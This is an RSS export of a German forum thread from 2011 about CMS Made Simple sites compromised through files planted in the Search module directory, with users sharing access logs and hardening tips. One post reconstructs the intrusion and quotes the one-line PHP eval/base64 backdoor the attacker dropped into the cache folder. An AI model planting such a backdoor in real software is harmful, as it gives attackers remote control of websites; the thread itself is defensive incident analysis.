<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="http://fbb.just4test.de/extern.php?action=feed&amp;tid=991&amp;type=rss" rel="self" type="application/rss+xml" />
		<title><![CDATA[Informationen für CMS/made simple / [GELÖST] Angriff über das Search Modul]]></title>
		<link>http://www.cmsmadesimple.de/forum/viewtopic.php?id=991</link>
		<description><![CDATA[Die aktuellsten Beiträge in [GELÖST] Angriff über das Search Modul.]]></description>
		<lastBuildDate>Fri, 15 Jul 2011 15:25:19 +0000</lastBuildDate>
		<generator>FluxBB</generator>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9245#p9245</link>
			<description><![CDATA[<div class="quotebox"><cite>mike-r schrieb:</cite><blockquote><div><p>Dein Exkurs zum News-Modul habe ich nicht ganz verstanden [...]</p></div></blockquote></div><p>Da gibt es auch nicht viel zu verstehen.<br />Durch diese Lücke hätte man sich z.B. selbst einen Admin-Zugang fürs Backend erstellen können.<br />Den Rest kann man sich ja dann selber ausmalen.</p><p>Die Sache mit den unbekannten POST-Daten wurmt mich etwas (hatte ganz vergessen, dass Apache von Haus aus ja keine Post Daten loggt - zu Testzwecken wäre vielleicht <a href="http://httpd.apache.org/docs/2.2/mod/mod_dumpio.html" rel="nofollow">mod_dumpio</a> ganz interessant, aber auf längere Zeit eher eine Zumutung). Wenn man wüsste was genau da drin stand, dann hätte man zumindest mal einen konkreten Ansatz.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Fri, 15 Jul 2011 15:25:19 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9245#p9245</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9240#p9240</link>
			<description><![CDATA[<div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><p>Hallo Peter,</p><p>willkommen im Forum und danke für Deine Analyse.</p></div></blockquote></div><p>Bitte - gerne! - Ich hoffe noch etwas Zeit zu finden für weitere Details</p><div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><div class="codebox"><pre><code>Erneuter POST - diesmal auf index.php - POST Daten nicht bekannt.</code></pre></div><p>Das ist merkwürdig. POST Daten nicht bekannt, heißt nach meinem Verständins &#039;keine Daten mitgesendet&#039;. Denn das anschließende &quot;trololo=825&quot; dürfte eigentlich überhaupt keinen Einfluss haben. Es müsste ganz normal die Startseite anzeigen. Wenn aber kurz darauf die index.php im cache Verzeichnis erstellt wurde, dann heißt das, dass irgendwo im CMS ein Script eingeschleust wurde, welches auf die Variable &#039;trololo&#039; hört und dann die index.php im cache Verzeichnis erstellt. Ich kann mir aber nicht vorstellen, dass das durch leere POST Daten geschehen ist.</p></div></blockquote></div><p>Nein - die POST Daten waren sicher nicht leer. Mit &quot;POST Daten nicht bekannt&quot; meine ich, dass ich einfach nicht weiss, was im POST Body drin war. Da müssen mit Bestimmtheit irgendwelche Daten drin gewesen sein - sonst geht&#039;s nicht. Aber im Log sind die ja nicht ersichtlich. Das mit dem Parameter &#039;trololo&#039; kann ich auf die Schnelle auch nirgends zuweisen, aber irgend eine Bewandtnis muss das noch haben. </p><p>Peter</p>]]></description>
			<author><![CDATA[dummy@example.com (Peter)]]></author>
			<pubDate>Fri, 15 Jul 2011 04:26:27 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9240#p9240</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9239#p9239</link>
			<description><![CDATA[<div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><p>Ich vermute, dass der Angriff schon viel früher begonnen hat. [...]</p></div></blockquote></div><p>Glaube ich nicht. CMSMS ist (mMn) viel zu klein, als dass da jemand langfristige Konzepte am Laufen hätte.</p><p>Dein Exkurs zum News-Modul habe ich nicht ganz verstanden (wobei es erklären könnte, warum ich auf keiner meiner (teilweise kamikazemässig alten) Installationen das Problem (bisher) habe, da ich das Modul nie nutz(t)e), ausser allein als <em>Spekulation</em>, wie Dein Fazit meint. <br />Das ist mir leider ein wenig zu dünn.</p><p>Was mich zur Wahrheitsfindung noch interessieren würde bei den Betroffenen: welche Rechte hat der Ordner MODULES bisher gehabt?</p>]]></description>
			<author><![CDATA[dummy@example.com (mike-r)]]></author>
			<pubDate>Fri, 15 Jul 2011 00:17:12 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9239#p9239</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9238#p9238</link>
			<description><![CDATA[<p>Hallo Peter,</p><p>willkommen im Forum und danke für Deine Analyse.</p><div class="codebox"><pre><code>Erneuter POST - diesmal auf index.php - POST Daten nicht bekannt.</code></pre></div><p>Das ist merkwürdig. POST Daten nicht bekannt, heißt nach meinem Verständins &#039;keine Daten mitgesendet&#039;. Denn das anschließende &quot;trololo=825&quot; dürfte eigentlich überhaupt keinen Einfluss haben. Es müsste ganz normal die Startseite anzeigen. Wenn aber kurz darauf die index.php im cache Verzeichnis erstellt wurde, dann heißt das, dass irgendwo im CMS ein Script eingeschleust wurde, welches auf die Variable &#039;trololo&#039; hört und dann die index.php im cache Verzeichnis erstellt. Ich kann mir aber nicht vorstellen, dass das durch leere POST Daten geschehen ist.</p><p>Eine Sicherheitslücke in der index.php bzw. in der Verarbeitung der POST Daten in der index.php ist meiner Meinung nach nicht das Problem. Auch nicht unbedingt in der Cache-Verwaltung. Direkter Zugriff auf php Dateien im tmp Verzeichnis sollte eigentlich - laut Sicherheitstipps - bereits mit einer .htaccess Datei verboten werden. Dann wäre zumindest das, was Peter beschreibt, nicht passiert. </p><p>Ich vermute, dass der Angriff schon viel früher begonnen hat. Dass erst kürzlich eine Sicherheitslücke in CMSms geschlossen wurde, habt ihr aber mitbekommen, oder? Diese Sicherheitslücke gab es leider schon sehr lange und zieht sich durch sämtliche CMSms Versionen. Dazu wurden die Versionen 1.6.10 und 1.9.4.2 veröffentlicht. D.h. alle anderen Versionen haben eine Schwachstelle im NewsModul, die sog. SQL Injektionen ermöglicht. Somit kann sich der Angreifer z.B. Zugang zum CMS verschaffen und eigentlich so ziemlich alles machen was er will. Ich vermute, dass über diese Lücke entsprechende Vorbereitungen getroffen wurden, für den Fall, dass diese Lücke geschlossen wird. Denn es ist merkwürdig, dass diese Probleme erst jetzt auftreten NACHDEM die Lücke eben geschlossen wurde. Als ob da jemand regelrecht darauf gewartet hätte. Denn das Sicherheitsupdate ändert lediglich ein paar Dateien im NewsModul. D.h. etwaige Veränderungen anderer Dateien durch den Angreifer bleiben davon unberührt. </p><p>Ich hatte schonmal an anderer Stelle erwähnt, dass man bei Sicherheitsupdates immer prüfen sollte, ob die Lücke nicht bereits ausgenutzt wurde. Ich weiß, das ist schwierig, aber ich hoffe, ihr versteht was ich damit sagen will. Ein Sicherheitsupdate bedeutet leider nicht, dass jetzt alles Paletti ist. Denn bis zum Update hatte der Angreifer genügend Zeit, entsprechende Mechanismen vorzubereiten.</p><p>(ist im Übrigen alles nur Spekulation, aber anders kann ich es mir momentan nicht erklären)</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Thu, 14 Jul 2011 23:35:42 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9238#p9238</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9236#p9236</link>
			<description><![CDATA[<p>Fällt mir jetzt auch nichts konkretes ein, ausser dass es schön ist, endlich mal halbwegs harte Fakten dazu zu sehen, danke.<br />Soweit ich das mit meinen bescheidenen Kenntnissen beurteilen kann, sieht es tatsächlich danach aus, dass das Problem offenbar tatsächlich nicht im Suchmodul zu finden ist. Sondern (berichtige mich jemand mit mehr Plan) in der index.php bzw. in der POST-verarbeitung dieser bzw. in der Cache-verwaltung.</p><p>Interessanterweise sind alle Probleme hier wie auch via Google ausschliesslich in CMSMS und da ausschliesslich immer im Ordner Search. Eine Hoster-schwachstelle kann man somit (imho) ausschliessen.</p>]]></description>
			<author><![CDATA[dummy@example.com (mike-r)]]></author>
			<pubDate>Thu, 14 Jul 2011 21:16:52 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9236#p9236</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9233#p9233</link>
			<description><![CDATA[<p>Ich habe eben kürzlich einen gleichen Fall analysiert:</p><p>cmsms Version 1.8.1<br />Wie ich bisher rekonstruieren konnte, lief das ganze in mehreren Stufen ab:</p><p>Ich habe die log Zeilen etwas gekürzt, damit&#039;s etwas lesbarer:<br /><span style="color: blue">&quot;POST hxxp://www.xx.xx/tmp/cache/index.php HTTP/1.1&quot; 404 188 &quot;-&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;</span><br />Da wird ein POST abgesetzt auf eine Datei die&#039;s so nicht gibt. -&gt; 404 </p><p>Erneuter POST - diesmal auf index.php - POST Daten nicht bekannt.<br /><span style="color: blue">&quot;POST hxxp://www.xx.xx/index.php HTTP/1.1&quot; 200 6045 &quot;-&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br /></span><br />.. und noch ein POST mit einem merkwürdigen Parameter &#039;trololo&#039; den ich sonst nirgends gefunden habe.<br /><span style="color: blue">&quot;POST hxxp://www.xx.xx/index.php?trololo=825 HTTP/1.1&quot; 200 6843 &quot;-&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;</span></p><p>Mit dem letzten POST muss dann index.php im cache Directory erzeugt worden sein, <br />denn der nächste POST liefert darauf offenbar ein 200 OK zurück.</p><p><span style="color: blue">&quot;POST hxxp://www.xx.xx/tmp/cache/index.php HTTP/1.1&quot; 200 65 &quot;-&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br /></span></p><p>Die Datei index.php im cache Directory ist der Bootstrap. Der Inhalt ist simpel:</p><p><span style="color: green">&lt;?php eval(base64_decode($_POST[&quot;ev&quot;])); ?&gt;</span></p><p>Über diesen Mechanismus ist dann etwas später das File action.do_readtemplate.php im Search Directory erstellt worden.<br /><span style="color: blue">&quot;POST hxxp://www.xx.xx/tmp/cache/index.php HTTP/1.1&quot; 200 65 &quot;-&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br /></span><br />Alle Zeitstempel der jeweiligen POSTs und Files stimmen jeweils exakt überein. D.h. die POST können dem Erzeugen der Files zugeordnet werden.</p><p>Damit ist die Sache erledigt. Alle weiteren Zugriffe etc. erfolgen dann über action.do_readtemplate.php. Mit dem Remote Pannel lässt sich dann alles anstellen .. also auch alle Seiten raufladen, Dateien runterladen - back connects einrichten etc.</p><p>Ich kenne die Eingeweide von cmsms zuwenig - um genau Nachzuvollziehen wie die Files erstellt wurden. Werde bei Gelegenheit noch etwas Zeit aufwerfen dafür. Ev. weiss ein Entwickler etwas mehr.</p><p>Gruss<br />Peter</p>]]></description>
			<author><![CDATA[dummy@example.com (Peter)]]></author>
			<pubDate>Thu, 14 Jul 2011 20:15:11 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9233#p9233</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9192#p9192</link>
			<description><![CDATA[<p>Danke für die Erklärung: Hier nun zur Beantwortung der Fragen.</p><p>Die Versionen bei denen diese Zugriffe erfolgten (insgesamt 3 verschiedene Installationen) waren allesamt älterer Natur. 1.7 - 1.8</p><p>Gehostet werden diese bei alfahosting.de</p><p>Die Sicherheitstipps wurden im Vorfeld nicht gänzlich befolgt. (htaccess-Berechtigungen hab ich vernachlässigt). Auch tunnelte ich nicht via SSH-Login, habe da die Gefahren vernachlässigt.</p><p>Inzwischen sind die Systeme auf die neueste Version geupdatet und mit htaccess-Sperren belegt.</p><p>Bedarf es noch weiterer Infos?</p><p>Danke für die schnelle Hilfe...</p><p>MatthiasN</p>]]></description>
			<author><![CDATA[dummy@example.com (MatthiasN)]]></author>
			<pubDate>Tue, 12 Jul 2011 17:26:44 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9192#p9192</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9072#p9072</link>
			<description><![CDATA[<p>Wieso beantwortet eigentlich niemand meine Fragen?<br />(CMSms Version, Sicherheitstipps, Provider ... )<br />Es gibt meines Wissens momentan keinen einzigen Anhaltspunkt dafür, dass das Suchmodul für diese Angriffe verantwortlich ist.</p><p>.htaccess Dateien kann man bei &quot;korrekter&quot; Konfiguration des Servers nicht via PHP Script bearbeiten oder erstellen. Jedenfalls sollte ein Server meiner Meinung nach so eingestellt sein, dass Apache keine Schreibberechtigungen für Konfigurationsdateien hat. Das ist meines Wissens sogar die Standardkonfiguration.</p><p>Ich vermisse immer noch die Accesslogs, aus denen hervorgeht, wie die Daten auf den Server gelangt sind.<br />Der Zugriff auf Dateien im Verzeichnis &quot;modules/Search/&quot; die da nicht hingehören, ist noch kein Beweis für eine Sicherheitslücke im Suchmodul. Das bedeutet lediglich, dass jemand in diesem Verzeichnis bestimmte Dateien abgelegt hat. Auf welchem Wege ist leider immer noch unklar.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Tue, 05 Jul 2011 15:33:02 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9072#p9072</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9070#p9070</link>
			<description><![CDATA[<p>Bei mir gab es einen ähnlichen Angriff, habe bei meinen Websites das Search modul entfernt.</p><p>Es wurde eine manipulierte .htaccess Datei hochgeladen die auf russische server umleitet. Anschliessend wurden wohl&#160; spam mails verschickt die eine URL enthielten die auf <a href="http://meinewebseite.de/modules/Search/News.html" rel="nofollow">http://meinewebseite.de/modules/Search/News.html</a> verwiesen. Dabei wurde dann über die .htacess umgeleitet</p><p>Ich habe alle passwörter geändert und die Search module auf allen webseiten gelöscht, da dieser Angriff am nächsten tag gleich wieder erfolgte...</p>]]></description>
			<author><![CDATA[dummy@example.com (mag82008)]]></author>
			<pubDate>Tue, 05 Jul 2011 14:52:28 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9070#p9070</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9059#p9059</link>
			<description><![CDATA[<p>Hast Du doch schon durch die .htaccess Datei.<br />Laut Deinen Logs wurde der Status 403 (Zugriff Verboten) zurückgegeben.<br />D.h. wer auch immer auf diese Dateien (ob nun per GET oder POST ist egal) zugreifen will, wird das nicht mehr können.</p><p>Ich würde die Dateien übrigens löschen und die Berechtigungen für das Modulverzeichnis und Unterverzeichnisse auf CHMOD 755 setzen.</p><p>Und auch an Dich die Fragen: <br />Welche CMS Version? <br />Hattest Du die Sicherheitstipps umgesetzt?<br />Welcher Provider?</p><p>Die Access-Logs geben leider auch bei Dir keinen Aufschluss darüber, wie die Dateien auf den Server gelangt sind.<br />Das Searchmodul scheint mir momentan nur der Dumme, der den Mist ausbaden darf. Schau auch mal in die System-Logs des CMS (im Backend unter &quot;Administration&quot;). Eventuell hat sich ja jemand Zugriff zum Backend verschafft (durch ein zu einfaches Passwort z.B.) und über den FileManager Dateien hochgeladen. Das müsste dann dort zu finden sein.</p><p>Ansonsten musst Du mal die FTP Logs oder die SSH Logs prüfen, wann sich wer eingeloggt hat. Eventuell ist der Angreifer auch darüber reingekommen.</p><p>Läuft auf dem Server noch andere Software?<br />Eventuell ist die Sicherheitslücke auch dort zu finden.</p><p>In jedem Fall würde ich jetzt erstmal sämtliche Passwörter ändern.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Tue, 05 Jul 2011 11:25:38 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9059#p9059</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9046#p9046</link>
			<description><![CDATA[<p>Hallo,</p><p>Auch bei mir gab es ein derartiges Problem. Über das Search-Modul meiner Seite hat sich schädlicher Code in den Order modules/Search/ eingenistet, der dann Spam auf über meine Seite versendet hat. Mittlerweile habe ich die Verzeichnisse mittels htaccess weitestgehend vor Zugriffen geschützt. </p><p>Dennoch zeigt mir das Serverlog noch folgende Einträge an:</p><br /><p> - - [05/Jul/2011:00:55:40 +0200] &quot;POST /modules/Search/lang/laboratory/softly.php HTTP/1.0&quot; 403 243 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:00:56:11 +0200] &quot;POST /modules/Search/lang/hate/border.php HTTP/1.0&quot; 403 237 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:00:58:38 +0200] &quot;GET /ferienwohnungen/ferienzimmer-stadt.html HTTP/1.1&quot; 200 12790 &quot;<a href="http://www.meine-domain.de/kontakt-ferienwohnung-stadt-pension.html" rel="nofollow">http://www.meine-domain.de/kontakt-feri … nsion.html</a>&quot; &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:00:59:32 +0200] &quot;GET /robots.txt HTTP/1.0&quot; 403 212 &quot;-&quot; &quot;ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:00:59:29 +0200] &quot;POST /modules/Search/lang/laboratory/softly.php HTTP/1.0&quot; 403 243 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:01:00:43 +0200] &quot;POST /modules/Search/lang/hate/border.php HTTP/1.0&quot; 403 237 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br />- - [05/Jul/2011:01:01:43 +0200] &quot;GET /kontakt-ferienwohnung-stadt-pension.html HTTP/1.1&quot; 200 12846 &quot;<a href="http://www.meine-domain.de/ferienwohnungen/ferienzimmer-stadt.html" rel="nofollow">http://www.meine-domain.de/ferienwohnun … stadt.html</a>&quot; &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br />- - [05/Jul/2011:01:02:40 +0200] &quot;GET /ferienwohnungen/ferienzimmer-stadt.html HTTP/1.1&quot; 200 12790 &quot;<a href="http://www.meine-domain.de/kontakt-ferienwohnung-stadt-pension.html" rel="nofollow">http://www.meine-domain.de/kontakt-feri … nsion.html</a>&quot; &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:01:04:03 +0200] &quot;POST /modules/Search/lang/laboratory/softly.php HTTP/1.0&quot; 403 243 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:01:04:26 +0200] &quot;GET / HTTP/1.1&quot; 200 13136 &quot;<a href="http://www.meine-domain.de/ferienwohnungen/ferienzimmer-stadt.html" rel="nofollow">http://www.meine-domain.de/ferienwohnun … stadt.html</a>&quot; &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a><br /> - - [05/Jul/2011:01:04:47 +0200] &quot;POST /modules/Search/lang/hate/border.php HTTP/1.0&quot; 403 237 &quot;-&quot; &quot;Mozilla/5.0&quot; <a href="http://www.meine-domain.de" rel="nofollow">www.meine-domain.de</a></p><p>Auf dem Server selbst kann ich, dank dem htaccess-File,&#160; keine solchen Dateien finden, die hier als POST aufgeführt werden.</p><p>Wie kann ich solche POST-Zugriffe zukünftig verhindern?</p>]]></description>
			<author><![CDATA[dummy@example.com (MatthiasN)]]></author>
			<pubDate>Mon, 04 Jul 2011 23:13:21 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=9046#p9046</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8829#p8829</link>
			<description><![CDATA[<div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><p>Davon mal abgesehen, wenn man auf den Modul Manager verzichtet und das Modulverzeichnis samt Unterverzeichnissen nicht beschreibbar ist, dann hätte dieser Angriff nie stattfinden können.</p></div></blockquote></div><p>Wenn da nicht die seltsame Angewohnheit mancher Programmierer wäre, nur und ausschließlich XML-Dateien zu veröffentlichen, siehe</p><p><a href="http://dev.cmsmadesimple.org/project/files/996" rel="nofollow">http://dev.cmsmadesimple.org/project/files/996</a></p><p> <img src="http://www.cmsmadesimple.de/forum/plugins/ezbbc/style/smilies/mad.png" alt="mad" /></p>]]></description>
			<author><![CDATA[dummy@example.com (cyberman)]]></author>
			<pubDate>Mon, 27 Jun 2011 11:31:25 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8829#p8829</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8823#p8823</link>
			<description><![CDATA[<p>Da hast du recht, allerdings gibt es auf dem Server keinen FTP Zugang. Es handelt sich dabei um einen VHost der von außen nur über Port 80 erreichbar ist und ansonsten nur SSH Zugang bietet. Dort scheint aber keiner außer mir Zugang bekommen zu haben. Also ist die Chance das es sich um eine Sicherheitslücke in einem PHP Skript handelt eigentlich recht hoch.</p><p>Ich werde auf jedenfall weiter versuchen herauszufinden wie diese Dateien Ursprünglich dort gelandet sind und werde es auch hier mit teilen, wenn ich etwas entsprechendes finde.</p>]]></description>
			<author><![CDATA[dummy@example.com (Mike)]]></author>
			<pubDate>Sun, 26 Jun 2011 21:31:06 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8823#p8823</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8821#p8821</link>
			<description><![CDATA[<p>Eine Datei namens action.do_readtemplate.php gibt es beim Searchmoul eigentlich auch nicht.<br />Falls möglich, prüfe auch mal die FTP-Logs.<br />Denn wichtig ist weniger wo sich die Dateien befinden (also völlig wurscht ob in modules/Search oder modules/News) sondern wie diese Dateien auf Deinen Webspace gelangt sind.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Sun, 26 Jun 2011 20:49:33 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8821#p8821</guid>
		</item>
		<item>
			<title><![CDATA[Re: [GELÖST] Angriff über das Search Modul]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8819#p8819</link>
			<description><![CDATA[<p>Danke für die schnellen Antworten.</p><p>Ich habe mittlerweile schon weitere Sicherungen nach einem Artikel eingefügt und den Modul Manager gelöscht und deaktiviert.</p><p>Ich schaue einmal weiter was ich so finde, es wundert mich halt nur das es sich nur auf das Verzeichnis beschränkt.</p><p>Bisher habe ich noch folgende Zeilen entdeckt:</p><p>[13/Jun/2011:10:41:30 +0200] &quot;GET <a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php?pass=rzoueenlfy" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … rzoueenlfy</a> HTTP/1.1&quot; 200 22820 &quot;<a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … mplate.php</a>&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br />[13/Jun/2011:10:41:30 +0200] &quot;POST <a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php?pass=rzoueenlfy&amp;" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … zoueenlfy&amp;</a> HTTP/1.1&quot; 200 909 &quot;<a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … mplate.php</a>&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br /> [13/Jun/2011:10:47:55 +0200] &quot;GET <a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php?pass=qdhowmistl" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … qdhowmistl</a> HTTP/1.1&quot; 200 22750 &quot;<a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … mplate.php</a>&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;<br />[13/Jun/2011:10:47:55 +0200] &quot;POST <a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php?pass=qdhowmistl&amp;" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … dhowmistl&amp;</a> HTTP/1.1&quot; 200 909 &quot;<a href="http://www.xxxxxxx.de/modules/Search/action.do_readtemplate.php" rel="nofollow">http://www.xxxxxxx.de/modules/Search/ac … mplate.php</a>&quot; &quot;Mozilla/5.0 ( Windows; U; Windows 2003; MSNIA )&quot;</p>]]></description>
			<author><![CDATA[dummy@example.com (Mike)]]></author>
			<pubDate>Sun, 26 Jun 2011 20:00:29 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=8819#p8819</guid>
		</item>
	</channel>
</rss>
